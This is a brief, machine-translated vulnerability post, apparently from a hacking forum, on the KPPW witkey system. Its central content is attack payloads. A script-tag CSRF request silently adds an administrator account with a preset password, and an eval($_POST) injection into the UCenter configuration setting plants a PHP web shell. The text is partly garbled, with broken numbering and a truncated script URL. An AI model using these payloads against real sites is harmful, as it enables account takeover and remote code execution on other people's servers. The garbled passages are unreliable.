Passenger passenger witkey system CSRF+getshell-a vulnerability warning-the black bar safety net

ID MYHACK58:62201338632
Type myhack58
Reporter take
Modified 2013-05-06T00:00:00


  1. Registered members

2, The

3, is sent to the admin, the following is a csrf, the purpose is to add an administrator account kppw password kppwkppw

<script src= php? do=user&view=add&edituid=&fds%5Busername%5D=kppw&fds%5Bpassword

%5D=kppwkppw&fds%5Bemail%5D=kppw%40kppw. com&fds%5Bgroup_id%5D=1&is_submit=1 ></script>

4, The getshell method of the two

(1)gpc off in the global configuration members to integrate UCENTER coding modifications to');eval($_POST[a])?& gt;;